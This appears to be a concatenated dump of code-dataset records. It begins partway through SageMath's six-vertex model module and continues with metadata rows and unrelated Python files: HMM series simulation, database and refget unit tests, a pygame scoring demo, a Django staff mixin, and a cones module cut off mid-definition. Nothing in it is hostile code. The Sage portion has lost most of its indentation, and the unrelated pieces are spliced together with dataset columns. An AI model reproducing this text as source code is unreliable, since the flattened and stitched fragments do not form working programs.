Return the signed matrix of ``self``.
The signed matrix corresponding to a six vertex configuration is
given by `0` if there is a cross flow, a `1` if the outward arrows
are vertical and `-1` if the outward arrows are horizonal.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: map(lambda x: x.to_signed_matrix(), M)
[
[1 0 0] [1 0 0] [ 0 1 0] [0 1 0] [0 1 0] [0 0 1] [0 0 1]
[0 1 0] [0 0 1] [ 1 -1 1] [1 0 0] [0 0 1] [1 0 0] [0 1 0]
[0 0 1], [0 1 0], [ 0 1 0], [0 0 1], [1 0 0], [0 1 0], [1 0 0]
]
"""
from sage.matrix.constructor import matrix
# verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
def matrix_sign(x):
if x == 0:
return -1
if x == 3:
return 1
return 0
return matrix([[matrix_sign(_) for _ in row] for row in self])
def plot(self, color='sign'):
"""
Return a plot of ``self``.
INPUT:
- ``color`` -- can be any of the following:
* ``4`` - use 4 colors: black, red, blue, and green with each
corresponding to up, right, down, and left respectively
* ``2`` - use 2 colors: red for horizontal, blue for vertical arrows
* ``'sign'`` - use red for right and down arrows, blue for left
and up arrows
* a list of 4 colors for each direction
* a function which takes a direction and a boolean corresponding
to the sign
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: print M[0].plot().description()
Arrow from (-1.0,0.0) to (0.0,0.0)
Arrow from (-1.0,1.0) to (0.0,1.0)
Arrow from (0.0,0.0) to (0.0,-1.0)
Arrow from (0.0,0.0) to (1.0,0.0)
Arrow from (0.0,1.0) to (0.0,0.0)
Arrow from (0.0,1.0) to (0.0,2.0)
Arrow from (1.0,0.0) to (1.0,-1.0)
Arrow from (1.0,0.0) to (1.0,1.0)
Arrow from (1.0,1.0) to (0.0,1.0)
Arrow from (1.0,1.0) to (1.0,2.0)
Arrow from (2.0,0.0) to (1.0,0.0)
Arrow from (2.0,1.0) to (1.0,1.0)
"""
from sage.plot.graphics import Graphics
from sage.plot.circle import circle
from sage.plot.arrow import arrow
if color == 4:
color_list = ['black', 'red', 'blue', 'green']
cfunc = lambda d,pm: color_list[d]
elif color == 2:
cfunc = lambda d,pm: 'red' if d % 2 == 0 else 'blue'
elif color == 1 or color is None:
cfunc = lambda d,pm: 'black'
elif color == 'sign':
cfunc = lambda d,pm: 'red' if pm else 'blue' # RD are True
elif isinstance(color, (list, tuple)):
cfunc = lambda d,pm: color[d]
else:
cfunc = color
G = Graphics()
for j,row in enumerate(reversed(self)):
for i,entry in enumerate(row):
if entry == 0: # LR
G += arrow((i,j+1), (i,j), color=cfunc(2, True))
G += arrow((i,j), (i+1,j), color=cfunc(1, True))
if j == 0:
G += arrow((i,j-1), (i,j), color=cfunc(0, False))
if i == 0:
G += arrow((i,j), (i-1,j), color=cfunc(3, False))
elif entry == 1: # LU
G += arrow((i,j), (i,j+1), color=cfunc(0, False))
G += arrow((i+1,j), (i,j), color=cfunc(3, False))
if j == 0:
G += arrow((i,j-1), (i,j), color=cfunc(0, False))
if i == 0:
G += arrow((i,j), (i-1,j), color=cfunc(3, False))
elif entry == 2: # LD
G += arrow((i,j+1), (i,j), color=cfunc(2, True))
G += arrow((i+1,j), (i,j), color=cfunc(3, False))
if j == 0:
G += arrow((i,j), (i,j-1), color=cfunc(2, True))
if i == 0:
G += arrow((i,j), (i-1,j), color=cfunc(3, False))
elif entry == 3: # UD
G += arrow((i,j), (i,j+1), color=cfunc(0, False))
G += arrow((i+1,j), (i,j), color=cfunc(3, False))
if j == 0:
G += arrow((i,j), (i,j-1), color=cfunc(2, True))
if i == 0:
G += arrow((i-1,j), (i,j), color=cfunc(1, True))
elif entry == 4: # UR
G += arrow((i,j), (i,j+1), color=cfunc(0, False))
G += arrow((i,j), (i+1,j), color=cfunc(1, True))
if j == 0:
G += arrow((i,j-1), (i,j), color=cfunc(0, False))
if i == 0:
G += arrow((i-1,j), (i,j), color=cfunc(1, True))
elif entry == 5: # RD
G += arrow((i,j+1), (i,j), color=cfunc(2, True))
G += arrow((i,j), (i+1,j), color=cfunc(1, True))
if j == 0:
G += arrow((i,j), (i,j-1), color=cfunc(2, True))
if i == 0:
G += arrow((i-1,j), (i,j), color=cfunc(1, True))
G.axes(False)
return G
def energy(self, epsilon):
r"""
Return the energy of the configuration.
The energy of a configuration `\nu` is defined as
.. MATH::
E(\nu) = n_0 \epsilon_0 + n_1 \epsilon_1 + \cdots + n_5 \epsilon_5
where `n_i` is the number of vertices of type `i` and
`\epsilon_i` is the `i`-th energy constant.
.. NOTE::
We number our configurations as:
0. LR
1. LU
2. LD
3. UD
4. UR
5. RD
which differs from :wikipedia:`Ice-type_model`.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: nu = M[2]; nu
^ ^ ^
| | |
--> # -> # <- # <--
^ | ^
| V |
--> # <- # -> # <--
| ^ |
V | V
--> # -> # <- # <--
| | |
V V V
sage: nu.energy([1,2,1,2,1,2])
15
A KDP energy::
sage: nu.energy([1,1,0,1,0,1])
7
A Rys `F` energy::
sage: nu.energy([0,1,1,0,1,1])
4
The zero field assumption::
sage: nu.energy([1,2,3,1,3,2])
15
"""
if len(epsilon) != 6:
raise ValueError("there must be 6 energy constants")
return sum(epsilon[entry] for row in self for entry in row)
class SixVertexModel(UniqueRepresentation, Parent):
"""
The six vertex model.
We model a configuration by indicating which configuration by the
following six configurations which are determined by the two outgoing
arrows in the Up, Right, Down, Left directions:
1. LR::
|
V
<-- # -->
^
|
2. LU::
^
|
<-- # <--
^
|
3. LD::
|
V
<-- # <--
|
V
4. UD::
^
|
--> # <--
|
V
5. UR::
^
|
--> # -->
^
|
6. RD::
|
V
--> # -->
|
V
INPUT:
- ``n`` -- the number of rows
- ``m`` -- (optional) the number of columns, if not specified, then
the number of columns is the number of rows
- ``boundary_conditions`` -- (optional) a quadruple of tuples whose
entries are either:
* ``True`` for an inward arrow,
* ``False`` for an outward arrow, or
* ``None`` for no boundary condition.
There are also the following predefined boundary conditions:
* ``'ice'`` - The top and bottom boundary conditions are outward and the
left and right boundary conditions are inward; this gives the square
ice model. Also called domain wall boundary conditions.
* ``'domain wall'`` - Same as ``'ice'``.
* ``'alternating'`` - The boundary conditions alternate between inward
and outward.
* ``'free'`` - There are no boundary conditions.
EXAMPLES:
Here are the six types of vertices that can be created::
sage: M = SixVertexModel(1)
sage: list(M)
[
| ^ | ^ ^ |
V | V | | V
<-- # --> <-- # <-- <-- # <-- --> # <-- --> # --> --> # -->
^ ^ | | ^ |
| , | , V , V , | , V
]
When using the square ice model, it is known that the number of
configurations is equal to the number of alternating sign matrices::
sage: M = SixVertexModel(1, boundary_conditions='ice')
sage: len(M)
1
sage: M = SixVertexModel(4, boundary_conditions='ice')
sage: len(M)
42
sage: all(len(SixVertexModel(n, boundary_conditions='ice'))
....: == AlternatingSignMatrices(n).cardinality() for n in range(1, 7))
True
An example with a specified non-standard boundary condition and
non-rectangular shape::
sage: M = SixVertexModel(2, 1, [[None], [True,True], [None], [None,None]])
sage: list(M)
[
^ ^ | ^
| | V |
<-- # <-- <-- # <-- <-- # <-- --> # <--
^ ^ | |
| | V V
<-- # <-- --> # <-- <-- # <-- <-- # <--
^ | | |
| , V , V , V
]
REFERENCES:
- :wikipedia:`Vertex_model`
- :wikipedia:`Ice-type_model`
"""
@staticmethod
def __classcall_private__(cls, n, m=None, boundary_conditions=None):
"""
Normalize input to ensure a unique representation.
EXAMPLES::
sage: M1 = SixVertexModel(1, boundary_conditions=[[False],[True],[False],[True]])
sage: M2 = SixVertexModel(1, 1, ((False,),(True,),(False,),(True,)))
sage: M1 is M2
True
"""
if m is None:
m = n
if boundary_conditions is None or boundary_conditions == 'free':
boundary_conditions = ((None,)*m, (None,)*n)*2
elif boundary_conditions == 'alternating':
bdry = True
cond = []
for dummy in range(2):
val = []
for k in range(m):
val.append(bdry)
bdry = not bdry
cond.append(tuple(val))
val = []
for k in range(n):
val.append(bdry)
bdry = not bdry
cond.append(tuple(val))
boundary_conditions = tuple(cond)
elif boundary_conditions == 'ice' or boundary_conditions == 'domain wall':
if m == n:
return SquareIceModel(n)
boundary_conditions = ((False,)*m, (True,)*n)*2
else:
boundary_conditions = tuple(tuple(x) for x in boundary_conditions)
return super(SixVertexModel, cls).__classcall__(cls, n, m, boundary_conditions)
def __init__(self, n, m, boundary_conditions):
"""
Initialize ``self``.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: TestSuite(M).run()
"""
self._nrows = n
self._ncols = m
self._bdry_cond = boundary_conditions # Ordered URDL
Parent.__init__(self, category=FiniteEnumeratedSets())
def _repr_(self):
"""
Return a string representation of ``self``.
EXAMPLES::
sage: SixVertexModel(2, boundary_conditions='ice')
The six vertex model on a 2 by 2 grid
"""
return "The six vertex model on a {} by {} grid".format(self._nrows, self._ncols)
def _repr_option(self, key):
"""
Metadata about the ``_repr_()`` output.
See :meth:`sage.structure.parent._repr_option` for details.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: M._repr_option('element_ascii_art')
True
"""
if key == 'element_ascii_art':
return True
return Parent._repr_option(self, key)
def _element_constructor_(self, x):
"""
Construct an element of ``self``.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: M([[3,1],[5,3]])
^ ^
| |
--> # <- # <--
| ^
V |
--> # -> # <--
| |
V V
"""
if isinstance(x, SixVertexConfiguration):
if x.parent() is not self:
return self.element_class(self, tuple(x))
return x
verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
elt = []
for row in x:
elt.append([])
for entry in row:
if entry in verts:
elt[-1].append(verts.index(entry))
elif entry in range(6):
elt[-1].append(entry)
else:
raise ValueError("invalid entry")
elt[-1] = tuple(elt[-1])
return self.element_class(self, tuple(elt))
Element = SixVertexConfiguration
    def __iter__(self):
        """
        Iterate through ``self``.

        Configurations are generated by a depth-first backtracking search:
        vertices (types ``0``-``5``) are placed row by row, each placement
        checked against the arrow coming from the left and the arrow coming
        from above; a completed grid is yielded only when the bottom
        boundary condition is also satisfied.

        EXAMPLES::

            sage: M = SixVertexModel(2, boundary_conditions='ice')
            sage: len(list(M))
            2
        """
        # Boundary conditions ordered URDL (up, right, down, left).
        # The top row boundary condition of True is a downward arrow;
        # the left condition of True is a right arrow.
        # Vertex numbering: verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD'].
        # For vertex type v placed at a cell:
        #   next_top[v]   -- arrow this vertex sends down to the next row
        #   next_left[v]  -- arrow this vertex sends right to the next cell
        #   check_top[v]  -- arrow this vertex requires from above
        #   check_left[v] -- arrow this vertex requires from the left
        next_top = [False, False, True, True, False, True]
        next_left = [True, False, False, False, True, True]
        check_top = [True, False, True, False, False, True]
        check_left = [False, False, False, True, True, True]
        # Stacks for the backtracking search; `is` comparisons below are
        # deliberate: None means "no constraint" and must not match.
        bdry = [self._bdry_cond[0]]
        lbd = list(self._bdry_cond[3]) + [None] # Dummy
        left = [ [lbd[0]] ]
        cur = [[-1]]
        n = self._nrows
        m = self._ncols
        while len(cur) > 0:
            # If we're at the last row
            if len(cur) > n:
                cur.pop()
                left.pop()
                # Check if all our bottom boundary conditions are satisfied
                if all(x is not self._bdry_cond[2][i]
                       for i,x in enumerate(bdry[-1])):
                    yield self.element_class(self, tuple(tuple(x) for x in cur))
                bdry.pop()
            # Find the next row
            row = cur[-1]
            l = left[-1]
            i = len(cur) - 1
            while len(row) > 0:
                # Advance the rightmost cell to its next candidate vertex.
                row[-1] += 1
                # Check to see if we have more vertices
                if row[-1] > 5:
                    row.pop()
                    l.pop()
                    continue
                # Check to see if we can add the vertex
                if (check_left[row[-1]] is l[-1] or l[-1] is None) \
                        and (check_top[row[-1]] is bdry[-1][len(row)-1]
                             or bdry[-1][len(row)-1] is None):
                    if len(row) != m:
                        l.append(next_left[row[-1]])
                        row.append(-1)
                    # Check the right boundary condition since we are at
                    # the rightmost entry; descend to the next row.
                    elif next_left[row[-1]] is not self._bdry_cond[1][i]:
                        bdry.append([next_top[x] for x in row])
                        cur.append([-1])
                        left.append([lbd[i+1]])
                        break
            # If we've killed this row, backup
            if len(row) == 0:
                cur.pop()
                bdry.pop()
                left.pop()
    def boundary_conditions(self):
        """
        Return the boundary conditions of ``self``.

        The result is a quadruple of tuples ordered URDL (up, right, down,
        left); ``True`` denotes an inward arrow, ``False`` an outward
        arrow and ``None`` no condition.

        EXAMPLES::

            sage: M = SixVertexModel(2, boundary_conditions='ice')
            sage: M.boundary_conditions()
            ((False, False), (True, True), (False, False), (True, True))
        """
        return self._bdry_cond
def partition_function(self, beta, epsilon):
r"""
Return the partition function of ``self``.
The partition function of a 6 vertex model is defined by:
.. MATH::
Z = \sum_{\nu} e^{-\beta E(\nu)}
where we sum over all configurations and `E` is the energy function.
The constant `\beta` is known as the *inverse temperature* and is
equal to `1 / k_B T` where `k_B` is Boltzmann's constant and `T` is
the system's temperature.
INPUT:
- ``beta`` -- the inverse temperature constant `\beta`
- ``epsilon`` -- the energy constants, see
:meth:`~sage.combinat.six_vertex_model.SixVertexConfiguration.energy()`
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: M.partition_function(2, [1,2,1,2,1,2])
e^(-24) + 2*e^(-28) + e^(-30) + 2*e^(-32) + e^(-36)
REFERENCES:
:wikipedia:`Partition_function_(statistical_mechanics)`
"""
from sage.functions.log import exp
return sum(exp(-beta * nu.energy(epsilon)) for nu in self)
class SquareIceModel(SixVertexModel):
r"""
The square ice model.
The square ice model is a 6 vertex model on an `n \times n` grid with
the boundary conditions that the top and bottom boundaries are pointing
outward and the left and right boundaries are pointing inward. These
boundary conditions are also called domain wall boundary conditions.
Configurations of the 6 vertex model with domain wall boundary conditions
are in bijection with alternating sign matrices.
"""
def __init__(self, n):
"""
Initialize ``self``.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: TestSuite(M).run()
"""
boundary_conditions = ((False,)*n, (True,)*n)*2
SixVertexModel.__init__(self, n, n, boundary_conditions)
def from_alternating_sign_matrix(self, asm):
"""
Return a configuration from the alternating sign matrix ``asm``.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: asm = AlternatingSignMatrix([[0,1,0],[1,-1,1],[0,1,0]])
sage: M.from_alternating_sign_matrix(asm)
^ ^ ^
| | |
--> # -> # <- # <--
^ | ^
| V |
--> # <- # -> # <--
| ^ |
V | V
--> # -> # <- # <--
| | |
V V V
TESTS::
sage: M = SixVertexModel(5, boundary_conditions='ice')
sage: ASM = AlternatingSignMatrices(5)
sage: all(M.from_alternating_sign_matrix(x.to_alternating_sign_matrix()) == x
....: for x in M)
True
sage: all(M.from_alternating_sign_matrix(x).to_alternating_sign_matrix() == x
....: for x in ASM)
True
"""
if asm.parent().size() != self._nrows:
raise ValueError("mismatched size")
#verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
ret = []
bdry = [False]*self._nrows # False = up
for row in asm.to_matrix():
cur = []
right = True # True = right
for j,entry in enumerate(row):
if entry == -1:
cur.append(0)
right = True
bdry[j] = False
elif entry == 1:
cur.append(3)
right = False
bdry[j] = True
else: # entry == 0
if bdry[j]:
if right:
cur.append(5)
else:
cur.append(2)
else:
if right:
cur.append(4)
else:
cur.append(1)
ret.append(tuple(cur))
return self.element_class(self, tuple(ret))
class Element(SixVertexConfiguration):
"""
An element in the square ice model.
"""
@combinatorial_map(name='to alternating sign matrix')
def to_alternating_sign_matrix(self):
"""
Return an alternating sign matrix of ``self``.
.. SEEALSO::
:meth:`~sage.combinat.six_vertex_model.SixVertexConfiguration.to_signed_matrix()`
EXAMPLES::
sage: M = SixVertexModel(4, boundary_conditions='ice')
sage: M[6].to_alternating_sign_matrix()
[1 0 0 0]
[0 0 0 1]
[0 0 1 0]
[0 1 0 0]
sage: M[7].to_alternating_sign_matrix()
[ 0 1 0 0]
[ 1 -1 1 0]
[ 0 1 -1 1]
[ 0 0 1 0]
"""
from sage.combinat.alternating_sign_matrix import AlternatingSignMatrix #AlternatingSignMatrices
#ASM = AlternatingSignMatrices(self.parent()._nrows)
#return ASM(self.to_signed_matrix())
return AlternatingSignMatrix(self.to_signed_matrix())
| 116 | 0 | 30 |
c16c292b423a49e5404423c97562139f099ffc25 | 1,558 | py | Python | data/Simulated/simulate_data.py | mehdibnc/Bayesian_Time_Series_Classification | eb0df76c39dd81e40c94c004154a1ded443531a1 | [
"BSD-3-Clause"
] | 2 | 2020-03-09T09:55:07.000Z | 2020-05-20T08:00:42.000Z | data/Simulated/simulate_data.py | mehdibnc/Bayesian_Time_Series_Classification | eb0df76c39dd81e40c94c004154a1ded443531a1 | [
"BSD-3-Clause"
] | null | null | null | data/Simulated/simulate_data.py | mehdibnc/Bayesian_Time_Series_Classification | eb0df76c39dd81e40c94c004154a1ded443531a1 | [
"BSD-3-Clause"
] | 2 | 2019-12-06T17:54:41.000Z | 2020-02-13T18:11:30.000Z | import numpy as np
import random
import scipy
| 31.795918 | 110 | 0.646341 | import numpy as np
import random
import scipy
def generate_markov_seq(n_states, transition_matrix, len_seq, init_state=None):
    """Generate a Markov-chain state sequence.

    Draws an initial state (uniformly at random when ``init_state`` is not
    given) and then performs ``len_seq`` transitions, so the returned
    sequence contains ``len_seq + 1`` states.

    Parameters
    ----------
    n_states : int
        Number of states; states are labelled ``0 .. n_states - 1``.
    transition_matrix : numpy.ndarray
        ``(n_states, n_states)`` row-stochastic matrix; row ``i`` holds the
        transition probabilities out of state ``i``.
    len_seq : int
        Number of transitions to perform.
    init_state : int, optional
        Initial state.  When ``None``, the initial state is drawn uniformly.

    Returns
    -------
    list
        The generated state sequence of length ``len_seq + 1``.
    """
    if init_state is not None:
        # BUGFIX: the previous truthiness test (`if init_state:`) silently
        # ignored a requested initial state of 0; compare against None.
        x_prev = init_state
    else:
        # TODO: support non-uniform initial-state probabilities.
        x_prev = np.random.choice(list(range(n_states)))
    seq = [x_prev]
    for _ in range(len_seq):
        # Sample the successor from the current state's transition row.
        draw = np.random.multinomial(1, transition_matrix[x_prev, :], size=1)
        x_succ = np.where(draw == 1)[1][0]
        seq.append(x_succ)
        x_prev = x_succ
    return seq
def generate_transtion_matrix(n_states):
    """Draw a random row-stochastic transition matrix.

    Each row is sampled uniformly from ``[0, 1)`` and normalised so that it
    sums to one.  Returns an ``(n_states, n_states)`` numpy array.
    """
    rows = []
    for _ in range(n_states):
        weights = np.random.random(n_states)
        rows.append(weights / weights.sum())
    return np.array(rows)
def generate_series(hidden_seq, params):
    """Emit one Gaussian observation per hidden state.

    ``params[s]`` holds ``(mean, std)`` for state ``s``; the result is a
    list with one normal draw per entry of ``hidden_seq``.
    """
    return [
        np.random.normal(params[state][0], params[state][1])
        for state in hidden_seq
    ]
def generate_samples(n_sample, lengths_range, P, params, noise=0., init_state=None):
    """Generate ``n_sample`` noisy HMM time series.

    For each sample a length ``T`` is drawn uniformly from
    ``[lengths_range[0], lengths_range[1])``, a hidden state path is
    simulated from the transition matrix ``P``, observations are emitted
    with ``params``, and uniform ``[0, 1)`` noise scaled by ``noise`` is
    added pointwise.  Returns a list of 1-D numpy arrays.
    """
    n_states = P.shape[0]
    samples = []
    for _ in range(n_sample):
        length = np.random.randint(lengths_range[0], lengths_range[1])
        # Hidden states sequence, then the series following the HMM model.
        hidden = generate_markov_seq(n_states, P, length, init_state)
        series = np.array(generate_series(hidden, params))
        # Additive uniform jitter on every point.
        samples.append(series + np.random.random(len(series)) * noise)
    return samples
| 1,417 | 0 | 92 |
ef47b645015237116a34d842a2f0e50b7986743b | 852 | py | Python | tests/t.py | zaber-paul/base | 9c4d4e40db7a5059dcaa32d44be0146b6bb829c4 | [
"Apache-2.0"
] | null | null | null | tests/t.py | zaber-paul/base | 9c4d4e40db7a5059dcaa32d44be0146b6bb829c4 | [
"Apache-2.0"
] | null | null | null | tests/t.py | zaber-paul/base | 9c4d4e40db7a5059dcaa32d44be0146b6bb829c4 | [
"Apache-2.0"
] | null | null | null | from builtins import object
from cloudmesh_base.base import HEADING
from cloudmesh_pbs.database import pbs_db, pbs_shelve
import os
| 23.027027 | 66 | 0.593897 | from builtins import object
from cloudmesh_base.base import HEADING
from cloudmesh_pbs.database import pbs_db, pbs_shelve
import os
class TestDatabase(object):
filename = "pbs.db"
def setup(self):
# HEADING()
self.db = pbs_db(self.filename, pbs_shelve)
def teardown(self):
# HEADING()
pass
"""
@classmethod
def setup_class(cls):
print ("setup_class() before any methods in this class")
@classmethod
def teardown_class(cls):
print ("teardown_class() after any methods in this class")
"""
def test_clear(self):
HEADING()
self.db.clear()
assert not os.path.isfile(self.filename)
def test_set(self):
HEADING()
self.db["element"] = "test"
assert self.db['element'] == "test"
| 285 | 411 | 24 |
eec8f79fbad64478516a5b0dade7f8244e1f9460 | 2,410 | py | Python | test/test_unit/test_ga4gh/test_refget/test_http/test_response.py | ga4gh/refget-cloud | c39a65acba9818414789f004cced487562012bf0 | [
"Apache-2.0"
] | null | null | null | test/test_unit/test_ga4gh/test_refget/test_http/test_response.py | ga4gh/refget-cloud | c39a65acba9818414789f004cced487562012bf0 | [
"Apache-2.0"
] | 3 | 2021-04-30T21:12:42.000Z | 2021-06-02T02:11:45.000Z | test/test_unit/test_ga4gh/test_refget/test_http/test_response.py | ga4gh/refget-cloud | c39a65acba9818414789f004cced487562012bf0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Unit tests for Response class"""
import pytest
from ga4gh.refget.http.response import Response
from ga4gh.refget.http.status_codes import StatusCodes as SC
from ga4gh.refget.config.constants import CONTENT_TYPE_JSON_REFGET_VND, \
CONTENT_TYPE_TEXT_REFGET_VND
testdata_body = [
("ACGT"),
('{"message": "NOTFOUND"}'),
('''{"service": {"circular_supported": false}}''')
]
testdata_status_code = [
(SC.OK),
(SC.PARTIAL_CONTENT),
(SC.NOT_ACCEPTABLE)
]
testdata_header = [
("Content-Type", CONTENT_TYPE_JSON_REFGET_VND),
("Content-Type", CONTENT_TYPE_TEXT_REFGET_VND),
("Content-Type", "application/json")
]
testdata_data = [
("seqid", "ga4gh:SQ.HKyMuwwEWbdUDXfk5o1EGxGeqBmon6Sp"),
("subseq-type", "start-end"),
("subseq-type", "range")
]
testdata_redirect = [
("https://ga4gh.org"),
("https://example.com"),
("https://anotherexample.com")
]
@pytest.mark.parametrize("body", testdata_body)
@pytest.mark.parametrize("status_code", testdata_status_code)
@pytest.mark.parametrize("key,value", testdata_header)
@pytest.mark.parametrize("key,value", testdata_data)
@pytest.mark.parametrize("url", testdata_redirect)
| 29.390244 | 73 | 0.69834 | # -*- coding: utf-8 -*-
"""Unit tests for Response class"""
import pytest
from ga4gh.refget.http.response import Response
from ga4gh.refget.http.status_codes import StatusCodes as SC
from ga4gh.refget.config.constants import CONTENT_TYPE_JSON_REFGET_VND, \
CONTENT_TYPE_TEXT_REFGET_VND
testdata_body = [
("ACGT"),
('{"message": "NOTFOUND"}'),
('''{"service": {"circular_supported": false}}''')
]
testdata_status_code = [
(SC.OK),
(SC.PARTIAL_CONTENT),
(SC.NOT_ACCEPTABLE)
]
testdata_header = [
("Content-Type", CONTENT_TYPE_JSON_REFGET_VND),
("Content-Type", CONTENT_TYPE_TEXT_REFGET_VND),
("Content-Type", "application/json")
]
testdata_data = [
("seqid", "ga4gh:SQ.HKyMuwwEWbdUDXfk5o1EGxGeqBmon6Sp"),
("subseq-type", "start-end"),
("subseq-type", "range")
]
testdata_redirect = [
("https://ga4gh.org"),
("https://example.com"),
("https://anotherexample.com")
]
@pytest.mark.parametrize("body", testdata_body)
def test_body(body):
response = Response()
response.set_body(body)
assert response.get_body() == body
@pytest.mark.parametrize("status_code", testdata_status_code)
def test_status_code(status_code):
response = Response()
response.set_status_code(status_code)
assert response.get_status_code() == status_code
@pytest.mark.parametrize("key,value", testdata_header)
def test_header(key, value):
response = Response()
response.put_header(key, value)
assert response.get_header(key) == value
assert response.get_headers()[key] == value
new_dict = {"headerA": "valueA", "headerB": "valueB"}
response.update_headers(new_dict)
assert response.get_header(key) == value
assert response.get_headers()[key] == value
@pytest.mark.parametrize("key,value", testdata_data)
def test_data(key, value):
response = Response()
response.put_data(key, value)
assert response.get_datum(key) == value
assert response.get_data()[key] == value
new_dict = {"dataA": "valueA", "dataB": "valueB"}
response.update_data(new_dict)
assert response.get_datum(key) == value
assert response.get_data()[key] == value
@pytest.mark.parametrize("url", testdata_redirect)
def test_redirect(url):
response = Response()
response.set_redirect_found(url)
assert response.get_status_code() == SC.REDIRECT_FOUND
assert response.get_header("Location") == url
| 1,093 | 0 | 110 |
fba93487b51dcb4e56ba07626edfd9c3d910229c | 2,356 | py | Python | display.py | fginther/pi-experiments | bd9b18b9dad8ac48651a6a90fa234573b726e52d | [
"MIT"
] | null | null | null | display.py | fginther/pi-experiments | bd9b18b9dad8ac48651a6a90fa234573b726e52d | [
"MIT"
] | null | null | null | display.py | fginther/pi-experiments | bd9b18b9dad8ac48651a6a90fa234573b726e52d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import time
import pygame
from pygame.locals import *
CHECK_LATCHES_INTERVAL = 100
CHECK_LATCHES = pygame.USEREVENT + 1
if __name__ == '__main__':
main()
| 25.89011 | 64 | 0.556027 | #!/usr/bin/env python
import time
import pygame
from pygame.locals import *
def get_current_time():
    """Return the current wall-clock time in whole milliseconds."""
    millis = time.time() * 1000
    return int(round(millis))
class Target(object):
    """A point-scoring target that latches for one second after a hit."""

    def __init__(self, value):
        """Create an unlatched target worth ``value`` points."""
        self.value = value
        self.latched = False
        self.latch_time = 0

    def trigger(self):
        """Register a hit.

        Returns ``False`` while the target is still latched; otherwise
        latches it for one second and returns ``True``.
        """
        if self.latched:
            return False
        self.latched = True
        self.latch_time = get_current_time() + 1000
        return True

    def clear(self):
        """Reset the target to its unlatched state."""
        self.latched = False
        self.latch_time = 0
CHECK_LATCHES_INTERVAL = 100
CHECK_LATCHES = pygame.USEREVENT + 1
def main():
    """Run the pygame demo: score key-triggered targets until the window closes.

    K_UP hits target[0] (100 points), K_DOWN hits target[1] (1000 points); a
    periodic CHECK_LATCHES timer event re-arms targets whose latch expired.
    """
    # Initialize the screen
    pygame.init()
    screen = pygame.display.set_mode((150, 150))
    pygame.display.set_caption('pygame')
    background = pygame.Surface(screen.get_size())
    background = background.convert()
    background.fill((250, 250, 250))
    # Display some text
    font = pygame.font.Font(None, 36)
    text = font.render("Hello There", 1, (10, 10, 10))
    textpos = text.get_rect()
    textpos.centerx = background.get_rect().centerx
    background.blit(text, textpos)
    # Blit everything to the screen
    screen.blit(background, (0, 0))
    pygame.display.flip()
    # Setup targets
    score = 0
    target = [Target(100), Target(1000)]
    print(target)
    print(target[0])
    # Setup timers: fire CHECK_LATCHES every CHECK_LATCHES_INTERVAL ms.
    pygame.time.set_timer(CHECK_LATCHES, CHECK_LATCHES_INTERVAL)
    # Event loop
    while True:
        current_time = get_current_time()
        for event in pygame.event.get():
            if event.type == QUIT:
                # Window closed: leave the loop (and the program).
                return
            if event.type == KEYDOWN:
                if event.key == K_UP:
                    # trigger() returns False while the target is latched,
                    # so holding the key cannot score repeatedly.
                    hit = target[0].trigger()
                    if hit:
                        score += target[0].value
                        print(score)
                if event.key == K_DOWN:
                    hit = target[1].trigger()
                    if hit:
                        score += target[1].value
                        print(score)
            if event.type == CHECK_LATCHES:
                # Re-arm every target whose latch window has passed; already
                # clear targets have latch_time == 0, so clearing them again
                # is a harmless no-op.
                for t in target:
                    if t.latch_time < current_time:
                        t.clear()
        screen.blit(background, (0, 0))
        pygame.display.flip()
        pygame.time.wait(100)
main()
| 2,022 | 0 | 149 |
6b2527c0cf8404b6e11f579b835d2c36f68128d6 | 272 | py | Python | staff/mixins.py | Mambodiev/ecom_website | ced03d61a99a7d657f7cb0106dbb9cf1ab15e367 | [
"MIT"
] | null | null | null | staff/mixins.py | Mambodiev/ecom_website | ced03d61a99a7d657f7cb0106dbb9cf1ab15e367 | [
"MIT"
] | 1 | 2022-03-30T21:19:09.000Z | 2022-03-30T21:19:09.000Z | staff/mixins.py | Mambodiev/ecom_website | ced03d61a99a7d657f7cb0106dbb9cf1ab15e367 | [
"MIT"
] | null | null | null | from django.shortcuts import redirect
| 30.222222 | 77 | 0.683824 | from django.shortcuts import redirect
class StaffUserMixin(object):
    """View mixin that only lets staff users through.

    Non-staff requests are redirected to the "home" URL; staff requests
    continue down the normal dispatch chain.
    """

    def dispatch(self, request, *args, **kwargs):
        if request.user.is_staff:
            return super(StaffUserMixin, self).dispatch(request, *args, **kwargs)
        # Anyone without staff rights is bounced to the landing page.
        return redirect("home")
| 176 | 8 | 49 |
66302df5b876a90bd49810dc1235682c54d54b47 | 11,687 | py | Python | OptMiniModule/diffcp/cones.py | markcx/DER_ControlPrivateTimeSeries | 16f9ea14dc5146005c1c88e9b880c10c9b1a3361 | [
"MIT"
] | null | null | null | OptMiniModule/diffcp/cones.py | markcx/DER_ControlPrivateTimeSeries | 16f9ea14dc5146005c1c88e9b880c10c9b1a3361 | [
"MIT"
] | null | null | null | OptMiniModule/diffcp/cones.py | markcx/DER_ControlPrivateTimeSeries | 16f9ea14dc5146005c1c88e9b880c10c9b1a3361 | [
"MIT"
] | null | null | null | import numpy as np
# import _proj as proj_lib
import scipy.sparse as sparse
import scipy.sparse.linalg as splinalg
ZERO = "f"
POS = "l"
SOC = "q"
PSD = "s"
EXP = "ep"
EXP_DUAL = "ed"
POWER = "p"
# The ordering of CONES matches SCS.
CONES = [ZERO, POS, SOC, PSD, EXP, EXP_DUAL, POWER]
def parse_cone_dict(cone_dict):
"""Parses SCS-style cone dictionary."""
return [(cone, cone_dict[cone]) for cone in CONES if cone in cone_dict]
def as_block_diag_linear_operator(matrices):
